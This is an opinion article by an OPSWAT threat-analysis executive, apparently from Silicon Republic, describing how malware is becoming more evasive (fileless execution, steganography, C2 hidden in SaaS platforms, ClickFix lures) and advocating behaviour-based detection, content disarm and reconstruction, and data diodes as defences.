OPSWAT’s Jan Miller explains how the threat landscape is changing, why legacy defences are failing and what businesses must do to protect vital systems.
Advanced cyberattackers are no longer overwhelming systems with brute force but are increasingly relying on stealth, modularity and evasion. With these attacks slipping past traditional defences, security built for yesterday’s threats is no longer enough.
Cybersecurity pros have become accustomed to dealing with noisy, brute-force campaigns that seek to overwhelm the target’s systems. Yet, we’re increasingly seeing threat groups opting for more evasive strategies where the aim is to remain invisible and maintain dwell time for as long as possible.
Threat groups are leaning into multi-stage execution chains, heavy obfuscation and techniques that blend into legitimate activity. OPSWAT telemetry shows that the average number of emulation stages or nodes within multi-stage malware has jumped by 127pc in just six months. This represents a significant increase in complexity, highlighting the rise of modular, adaptive malware designed to evade common detection tools.
One factor to consider here is the continued rise of fileless malware and living-off-the-land techniques. These attacks use trusted tools such as PowerShell or .NET reflection to execute entirely in memory – leaving no artefacts for signature-based tools to detect. Attackers are also embedding payloads in benign-seeming formats, from .NET Bitmap files to images carrying hidden code through steganography.
Likewise, command-and-control (C2) channels now often hide within legitimate platforms such as Google Sheets and Calendar, making them harder to identify and block without disrupting legitimate business operations.
Some new techniques are even moving away from traditional payloads entirely.
One prominent tactic is known as ClickFix, where attackers trick users into pasting code into the Windows Run prompt. This typically comes in the guise of a technical fix for a common IT issue, but will actually complete malicious functions such as granting the attacker remote access to the user’s keyboard.
Despite the increased complexity and sophistication of these attacks, threat groups will still play the numbers game and launch large volumes of attacks. The number of phishing attacks has continued to increase in recent years, with credential theft attempts surging by more than 160pc so far in 2025 alone.
Why are legacy tools not enough to protect organisations?
Simply put, legacy security tools were built for a different era of cyberthreats. Signature and reputation-based tools once offered a strong first line of defence, but their success forced attackers to evolve.
Therefore, while some groups are still relying on the same archaic tactics, a growing volume of modern malware is designed to bypass such methods. Our analysis shows that one in every 14 threats goes undetected by public feeds and is only identified later through behavioural analysis. This results in a significant blind spot where attacks are unlikely to be noticed in a timely manner.
One of the biggest issues that organisations face is that so many security stacks are built around detecting known threat signatures. Because fileless and memory-only malware never writes to disk, there is no signature for these tools to match. Therefore, such malware is largely invisible to traditional detection.
In addition, attackers use advanced obfuscation layers and commercial packers to hide payloads, often embedding them in corrupted Office files or uncommon executable formats that confuse static scanners. These protective wrappers mean that even known malware families can be difficult for traditional antivirus and endpoint detection and response (EDR) stacks to detect and identify.
Adversaries are also specifically exploiting reputation-based security systems, as they struggle when C2 traffic is hidden within widely used platforms like Google Sheets. Hiding C2 traffic inside legitimate SaaS architecture increases the attacker’s ability to evade detection and maintain persistence for longer.
Truthfully, even without these new tactics, legacy stacks would still be straining under the rapid expansion of the attack surface. Most organisations have pursued digitalisation efforts that have steadily increased the size and complexity of their IT environments. This means more systems to manage and secure, and OPSWAT anticipates as many as 50,000 new vulnerabilities this year – far too many for static, reactive and siloed tools to manage.
What do businesses need to do to protect critical systems?
These new tactics can seem daunting, but it’s important to remember they exist precisely because older defences were so effective. Thus, it’s not impossible for enterprises to repel these attacks, but a strategic, adaptive response is essential.
The first step is recognising that outdated, reactive tools are no longer enough. Adaptive, behaviour-first detection pipelines are needed to keep up with the latest evasive tactics.
We need to focus on how threats act, not just what they look like; this means building modern detection pipelines that combine emulation-based sandboxing, and machine learning-powered threat hunting capabilities to uncover hidden intent across every stage of the kill chain.
Just as we’ve noticed a steep increase in complex, multi-layered malware tactics, defences must respond with multiple levels. Layering reputation checks with behavioural analysis means organisations have a much better chance of detecting threats from the moment of initial access, increasing the odds of stopping them before they can reach their goals.
Content disarm and reconstruction (CDR) is important here, treating all incoming files as potentially malicious, and rebuilding and sanitising them to remove any threats. Alongside this, implementing managed file transfer (MFT) capabilities will increase visibility into file-born threats and automatically block or sandbox suspicious transfers.
This strategy greatly improves detection capabilities across executables, scripts and documents. Crucially, it also closes the gap on zero-day and fileless threats that are out of reach for traditional antivirus software.
Security architectures must also counter the increasingly subtle methods adversaries are using to establish C2 traffic. One effective method here is the use of data diodes, which are hardware units that enforce unidirectional data flow. This prevents the use of hidden exfiltration tactics.
It’s important to remember that resilience is about more than buying the latest technology –solutions must be reinforced by the right processes. Adopting continuous detection and response practices will help ensure constant monitoring, containment and remediation. Risk-based vulnerability management processes are also vital to prioritise how limited resources cope with a growing number of vulnerabilities.
Investing in adaptive, intelligence-driven defences allows organisations to level the playing field against an adversary playbook built on stealth, speed and constant evolution.
By Jan Miller
Jan Miller is CTO of Threat Analysis at OPSWAT. He leads the security operations product suite, focusing on ML-based threat hunting and sandboxing solutions. A serial entrepreneur and developer, Miller has founded and led multiple cybersecurity start-ups centered around automated malware analysis.
Don’t miss out on the knowledge you need to succeed. Sign up for the Daily Brief, Silicon Republic’s digest of need-to-know sci-tech news.
www.siliconrepublic.com (Article Sourced Website)
#Cyberattackers #evasive #defenders